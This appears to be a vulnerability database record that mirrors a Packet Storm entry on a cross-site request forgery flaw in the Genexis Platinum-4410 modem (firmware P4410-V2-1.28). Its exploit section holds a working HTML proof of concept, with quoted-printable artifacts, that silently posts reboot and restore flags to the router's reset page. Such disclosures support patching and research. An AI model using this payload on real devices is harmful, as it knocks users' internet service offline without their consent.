ID

VAR-E-202010-0085


TITLE

Genexis Platinum-4410 P4410-V2-1.28 Cross Site Request Forgery

Trust: 0.5

sources: PACKETSTORM: 159766

DESCRIPTION

Genexis Platinum-4410 version P4410-V2-1.28 suffers from a cross site request forgery vulnerability.

Trust: 0.5

sources: PACKETSTORM: 159766

AFFECTED PRODUCTS

vendor:genexismodel:platinum-4410 p4410-v2-1.28scope: - version: -

Trust: 0.5

sources: PACKETSTORM: 159766

EXPLOIT

# Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Cross Site Request Forgery to Reboot
# Date: 10/28/2020
# Exploit Author: Mohammed Farhan
# Vendor Homepage: https://genexis.co.in/product/ont/
# Version: Platinum-4410 Software version - P4410-V2-1.28
# Tested on: Windows 10
# Author Contact: https://twitter.com/farhankn

Vulnerability Details
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Login to the application
Create an HTML file using the below mentioned code

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action=3D"http://192.168.1.1/cgi-bin/mag-reset.asp" method=3D"POS=
T">
<input type=3D"hidden" name=3D"rebootflag" value=3D"1" />
<input type=3D"hidden" name=3D"restoreFlag" value=3D"1" />
<input type=3D"hidden" name=3D"isCUCSupport" value=3D"0" />
<input type=3D"submit" value=3D"Submit request" />
</form>
</body>
</html>

Open the HTML page in the browser and Click on "Submit Request"
Note that modem reboots after the same

Trust: 0.5

sources: PACKETSTORM: 159766

EXPLOIT HASH

LOCAL

SOURCE

md5: 146fa3e7e680262eec3c8a7849e57ef6
sha-1: b510c8bef15b68c505f61f03255b7148d658d57e
sha-256: cd3794a1c45a5196d326376b26aa0d62abf73663d405a3b352ac105735b4a929
md5: 146fa3e7e680262eec3c8a7849e57ef6

Trust: 0.5

sources: PACKETSTORM: 159766

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 159766

TYPE

csrf

Trust: 0.5

sources: PACKETSTORM: 159766

TAGS

tag:exploit

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 159766

CREDITS

Mohammed Farhan

Trust: 0.5

sources: PACKETSTORM: 159766

EXTERNAL IDS

db:PACKETSTORMid:159766

Trust: 0.5

sources: PACKETSTORM: 159766

SOURCES

db:PACKETSTORMid:159766

LAST UPDATE DATE

2022-07-27T09:24:02.807000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:159766date:2020-10-29T14:31:47